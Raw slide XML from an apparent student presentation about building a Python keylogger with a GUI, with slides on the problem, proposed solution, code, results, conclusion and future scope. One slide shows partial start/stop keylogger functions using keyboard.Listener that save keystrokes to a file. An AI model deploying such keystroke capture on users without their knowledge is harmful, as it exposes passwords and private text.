        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048615" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-427071"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048616" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>start_button</a:t>
            </a:r>
            <a:endParaRPr dirty="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17" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097155" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384726" y="1719024"/>
            <a:ext cx="2991267" cy="3419952"/>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18" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097156" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904352" y="1692540"/>
            <a:ext cx="7487695" cy="752580"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097157" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720801" y="3458124"/>
            <a:ext cx="11250407" cy="1563408"/>
          </a:xfrm>
          <a:prstGeom prst="rec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19" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048620" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901232" y="0"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="0" dirty="0" sz="2000" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The keylogger program is a powerful tool that can be used to monitor and record keystrokes on a computer system. The program can be used for both legitimate and malicious purposes, and it is important to ensure that it is used ethically and legally. The program can be used to monitor employee activity, detect malicious software, and assist in troubleshooting technical issues. However, it is crucial to ensure that the use of the program respects the privacy and security of the users.</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="2000" lang="en-I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21" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr b="1" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>There are several ways in which the keylogger program can be improved and enhanced in the future. Here are some possible ideas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Real-time monitoring: The program can be enhanced to provide real-time monitoring of keystrokes. This can be useful for detecting and preventing malicious activities in real-time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Filtering of specific keywords: The program can be enhanced to filter specific keywords and provide alerts when those keywords are detected. This can be useful for detecting and preventing unauthorized access to sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integration with other security tools: The program can be integrated with other security tools, such as firewalls and intrusion detection systems, to provide a more comprehensive security solution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Cross-platform compatibility: The program can be enhanced to support cross-platform compatibility, allowing it to be used on different operating systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Improved user interface: The program can be enhanced to provide a more user-friendly interface, making it easier for users to navigate and use the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048622" name="Title 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535670" y="844659"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" vert="horz">
            <a:normAutofit/>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a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Future scope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23" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048624" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="2400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="2400" lang="en-IN"/>
              <a:t>2.https://www.bing.com/ck/a?!&amp;&amp;p=1f4ad54fbd8b6758JmltdHM9MTcxMTg0MzIwMCZpZ3VpZD0wY2FkZjU2My03YjRjLTZiMTctMzU4Ny1lNmJmN2E5ZTZhOTcmaW5zaWQ9NTUyOA&amp;ptn=3&amp;ver=2&amp;hsh=3&amp;fclid=0cadf563-7b4c-6b17-3587-e6bf7a9e6a97&amp;psq=keyloggrs&amp;u=a1aHR0cHM6Ly93d3cuZ2Vla3Nmb3JnZWVrcy5vcmcvaW50cm9kdWN0aW9uLXRvLWtleWxvZ2dlcnMv&amp;ntb=1</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29" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463041" y="2766218"/>
            <a:ext cx="9298744" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr b="1" lang="en-US">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p>
            <a:r>
              <a:rPr b="1" lang="en-US">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586490" y="1618938"/>
            <a:ext cx="11019020" cy="5239062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" vert="horz">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Problem Statement </a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Proposed System/Solution </a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Development Approach</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment  </a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Future Scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:endParaRPr dirty="0"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Problem Statement</a:t>
            </a:r>
            <a:endParaRPr sz="4400" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048598" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="323232"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629435"/>
            <a:r>
              <a:rPr b="0" dirty="0" sz="2400" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The keylogger program is a simple script that records all the keystrokes made on the user's keyboard and saves them in a text file. However, the program has some limitations, such as the inability to differentiate between key presses and key releases, and the lack of a graphical user interface (GUI) for easy start and stop of the keylogger.</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p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Proposed Solution</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="4400" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048600" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909017" y="233938"/>
            <a:ext cx="11613485" cy="5563973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" vert="horz">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1800" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>To overcome the limitations of the existing keylogger program, we propose to develop a new keylogger with the following features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Improved keylogging functionality: The new keylogger will be able to differentiate between key presses and key releases and record them separately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>GUI for easy start and stop of the keylogger: The new keylogger will have a GUI that allows the user to start and stop the keylogger with a single click.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" dirty="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>JSON file generation: The new keylogger will generate a JSON file that contains the keylogging data, making it easier to analyze and visualize the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="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01" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="662572"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>System  Approach</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="4400" lang="en-US">
